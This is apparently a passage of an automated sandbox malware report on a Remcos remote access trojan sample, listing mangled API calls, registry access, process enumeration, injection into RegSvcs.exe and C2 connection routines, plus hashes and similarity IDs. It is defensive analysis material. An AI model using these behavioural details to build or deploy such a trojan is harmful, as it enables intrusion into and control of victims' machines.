                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B91F9
                                            • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013B9210
                                            • ??2@YAPAXI@Z.MSVCRT ref: 013B921B
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013B9226
                                            • wcscpy.MSVCRT ref: 013B9230
                                            • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013B923F
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013B924B
                                            • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013B9254
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,013C40D8,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013B926C
                                              • Part of subcall function 013BB8F8: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000), ref: 013BB934
                                              • Part of subcall function 013BB8F8: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BB950
                                            • ??3@YAXPAX@Z.MSVCRT ref: 013B9280
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000034,?), ref: 013B929E
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 013B92A7
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(licence), ref: 013B92B7
                                              • Part of subcall function 013BB708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 013BB715
                                              • Part of subcall function 013BB708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(013CBCB0,00000000,?,013BB948,?,?,?,?,?,?,00000000), ref: 013BB724
                                              • Part of subcall function 013BB708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,013BB948,?,?,?,?,?,?,00000000), ref: 013BB72E
                                              • Part of subcall function 013BB708: RegSetValueExA.KERNELBASE(?,013BB948,00000000,?,00000000,?,013BB948,?,?,?,?,?,?,00000000), ref: 013BB741
                                              • Part of subcall function 013BB708: RegCloseKey.ADVAPI32(?,?,013BB948,?,?,?,?,?,?,00000000), ref: 013BB74C
                                              • Part of subcall function 013BB708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,013BB948,?,?,?,?,?,?,00000000), ref: 013BB75B
                                            • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,0000000D,013C5B14), ref: 013B92DA
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000028), ref: 013B938A
                                            • atoi.MSVCRT ref: 013B9391
                                            • CreateThread.KERNEL32 ref: 013B93C0
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000F), ref: 013B93CD
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 013B93E1
                                            • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000,00000031,013C5800), ref: 013B9402
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B9410
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000011), ref: 013B9432
                                            • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000000), ref: 013B9444
                                            • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 013B945D
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B9466
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000031), ref: 013B948B
                                            • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000000), ref: 013B949D
                                            • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 013B94B8
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B94C1
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B94CA
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,013CB964,013C5A24,00000000,00000011), ref: 013B94F4
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(013C40D8,00000000,?,00000000,00000011), ref: 013B9501
                                            • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,00000000,00000011), ref: 013B950D
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 013B9516
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 013B951F
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 013B9528
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000036,?,?,?,?,00000000,00000011), ref: 013B9539
                                            • atoi.MSVCRT ref: 013B9540
                                              • Part of subcall function 013C2795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,013C35AE,?,?,?,?,?,?,?,013B969A,?,?), ref: 013C27A4
                                              • Part of subcall function 013C2795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,013C35AE,?,?,?,?,?,?,?,013B969A,?,?), ref: 013C27AE
                                              • Part of subcall function 013C2795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,013C35AE,?,?,?,?,?,?,?,013B969A,?,?), ref: 013C27B7
                                              • Part of subcall function 013C2795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,013C35AE,?,?,?,?,?,?,?,013B969A,?,?), ref: 013C27C1
                                              • Part of subcall function 013C2795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,013C35AE,?,?,?,?,?,?,?,013B969A,?,?), ref: 013C27CB
                                              • Part of subcall function 013C2795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,013C35AE,?,?,?,?,?,?,?,013B969A,?), ref: 013C27E1
                                              • Part of subcall function 013C2795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,013C35AE,?,?,?,?,?,?,?,013B969A,?,?), ref: 013C27EA
                                              • Part of subcall function 013B9A2F: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,013CBCB0,00000000), ref: 013B9A49
                                              • Part of subcall function 013B9A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,013C66B4,?,013CBCB0,00000000), ref: 013B9A5E
                                              • Part of subcall function 013B9A2F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?,00000000), ref: 013B9A77
                                              • Part of subcall function 013B9A2F: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 013B9A81
                                              • Part of subcall function 013B9A2F: Process32FirstW.KERNEL32(?,?), ref: 013B9A9D
                                              • Part of subcall function 013B9A2F: Process32NextW.KERNEL32(?,0000022C), ref: 013B9AAC
                                              • Part of subcall function 013B9A2F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 013B9ACC
                                              • Part of subcall function 013B9A2F: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60 ref: 013B9ADB
                                              • Part of subcall function 013B9A2F: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 013B9AE5
                                              • Part of subcall function 013B9A2F: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 013B9AEF
                                              • Part of subcall function 013B9A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z.MSVCP60(?,?,00000000), ref: 013B9B03
                                              • Part of subcall function 013B9A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B9B13
                                              • Part of subcall function 013B9A2F: Process32NextW.KERNEL32(?,0000022C), ref: 013B9B23
                                              • Part of subcall function 013B9A2F: ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 013B9B3F
                                              • Part of subcall function 013B9A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B9B48
                                              • Part of subcall function 013B9A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,?), ref: 013B9B59
                                              • Part of subcall function 013B9A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B9B64
                                              • Part of subcall function 013B9A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B9B6D
                                              • Part of subcall function 013B9A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B9B76
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000037,?,?,?,00000000,00000011), ref: 013B9564
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000011), ref: 013B958C
                                            • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000014,?,?,?,?,?,?,?,?,00000000,00000011), ref: 013B95C2
                                            • ??2@YAPAXI@Z.MSVCRT ref: 013B95CF
                                            • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000035,?,?,?,?,?,?,?,?,00000000,00000011), ref: 013B95E5
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B9814
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$V01@@$?data@?$basic_string@$??0?$basic_string@V01@$??4?$basic_string@$V?$basic_string@$G@2@@0@$Hstd@@$CreateV10@$??8std@@?begin@?$basic_string@?length@?$basic_string@?size@?$basic_string@G@1@@$CloseD@1@@D@2@@0@D@std@@@std@@Process32$??2@?end@?$basic_string@?find@?$basic_string@A?$basic_string@FileModuleMutexNameNextOpenV12@Valueatoimallocwcslen$??0?$basic_ofstream@??3@??6std@@??9std@@?close@?$basic_ofstream@?substr@?$basic_string@D?$basic_ofstream@D@std@@@0@DirectoryErrorFirstG@2@@0@0@HandleLastObjectQuerySingleSnapshotThreadToolhelp32V10@0@V10@@V?$basic_ostream@WaitY?$basic_string@freewcscmpwcscpy
                                            • String ID: (32 bit)$ (64 bit)$0:xt$Access level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe$Inj$Normal$ProductName$Remcos_Mutex_Inj$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Software\$[INFO]$exepath$licence$licence_code.txt$origmsc
                                            • API String ID: 1672879135-3354130589
                                            • Opcode ID: 09e5402a67030fe907c9395ca602e153bba72428e0e0fce87e2a0f1c10fde013
                                            • Instruction ID: 3fe4af316abd68a1250b4fbaa0937239ed156bd18ef294e33282037ed7c1962f
                                            • Opcode Fuzzy Hash: 09e5402a67030fe907c9395ca602e153bba72428e0e0fce87e2a0f1c10fde013
                                            • Instruction Fuzzy Hash: 4862F2B1B00209AFDB156BB4AC9DAFE7F6DAB94709F00001DF202DB285EF75AD448760
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013BC81C, Relevance: 251.0, APIs: 135, Strings: 8, Instructions: 764sleepnetworkthreadCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 013C2407: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,747843E0,013CBCB0,00000000), ref: 013C2492
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,747843E0,013CBCB0,00000000), ref: 013BC83F
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000029), ref: 013BC855
                                            • atoi.MSVCRT ref: 013BC85C
                                            • Sleep.KERNEL32(00000000), ref: 013BC870
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(013C6954,?), ref: 013BC884
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 013BC898
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(013C5B50,?), ref: 013BC8CE
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 013BC8E5
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Connecting to ,00000000,00000000,013C5B50,00000000), ref: 013BC933
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,00000000,013C5B50,00000000), ref: 013BC943
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,013C5B50,00000000), ref: 013BC950
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,00000000,?,?,?,?,013C5B50,00000000), ref: 013BC961
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 013BC975
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 013BC981
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 013BC99B
                                            • gethostbyname.WS2_32(00000000), ref: 013BC9A2
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 013BC9D7
                                            • atoi.MSVCRT ref: 013BC9DE
                                            • htons.WS2_32(00000000), ref: 013BC9E6
                                            • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 013BCA10
                                            • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 013BCA18
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 013BCA21
                                            • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(013C5664,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 013BCA3E
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Connected to ,00000000,00000000,013C5B50,00000000), ref: 013BCA92
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,00000000,013C5B50,00000000), ref: 013BCAA2
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,013C5B50,00000000), ref: 013BCAAC
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,00000000,?,?,?,?,013C5B50,00000000), ref: 013BCABD
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 013BCAD1
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 013BCADD
                                            • sprintf.MSVCRT ref: 013BCB14
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(013CB954), ref: 013BCB25
                                            • _itoa.MSVCRT ref: 013BCB37
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,00000001), ref: 013BCB50
                                            • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 013BCB5D
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 013BCB66
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(name,?,00000104,00000000), ref: 013BCB83
                                              • Part of subcall function 013BB692: RegOpenKeyExA.KERNELBASE(80000001,013B936A,00000000,00020019,013B936A), ref: 013BB6AC
                                              • Part of subcall function 013BB692: RegQueryValueExA.KERNELBASE(013B936A,?,00000000,00000000,?,?,013CBCC0), ref: 013BB6C8
                                              • Part of subcall function 013BB692: RegCloseKey.KERNELBASE(013B936A), ref: 013BB6D3
                                            • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(?), ref: 013BCBA5
                                              • Part of subcall function 013C2855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,013BCBF0,?,013CBA28,013CB310,?), ref: 013C2860
                                              • Part of subcall function 013C2855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,013BCBF0,?,013CBA28,013CB310,?), ref: 013C286C
                                              • Part of subcall function 013C2855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,013BCBF0,?,013CBA28,013CB310,?), ref: 013C2876
                                              • Part of subcall function 013B9E7D: GetLocaleInfoA.KERNELBASE(00000800,0000005A,00000000,00000003,013CBFB8,?,013BCCE4,?,013CB310,013CBCD8,013CB310,00000000,013CB310,00000000,013CB310,2.7.2 Pro), ref: 013B9E8E
                                              • Part of subcall function 013B9E7D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,013BCCE4,?,013CB310,013CBCD8,013CB310,00000000,013CB310,00000000,013CB310,2.7.2 Pro,013CB310,00000000,013CB310), ref: 013B9E9F
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe,?), ref: 013BCBCC
                                            • GetTickCount.KERNEL32 ref: 013BCC20
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,013CB310,00000000,013CB310,00000000,013CB310,013CBCD8,013CB310,00000000,013CB310,00000000,013CB310,2.7.2 Pro,013CB310,00000000), ref: 013BCD07
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,013CB310,00000000,00000000,013CB310,00000000), ref: 013BCD17
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,013CB310,00000000,00000000,013CB310,00000000), ref: 013BCD27
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,013CB310,00000000,00000000,013CB310,00000000), ref: 013BCD37
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,013CB310,00000000,00000000,013CB310), ref: 013BCD47
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,013CB310), ref: 013BCD57
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013BCD67
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013BCD77
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013BCD87
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 013BCD97
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013BCDA7
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 013BCDB7
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013BCDC7
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013BCDD7
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013BCDE7
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013BCDF7
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013BCE07
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013BCE17
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013BCE27
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013BCE37
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013BCE47
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 013BCE57
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013BCE67
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013BCE77
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013BCE87
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013BCE97
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013BCEA7
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 013BCEB7
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013BCEC7
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013BCED7
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013BCEE7
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013BCEF7
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013BCF07
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013BCF17
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013BCF27
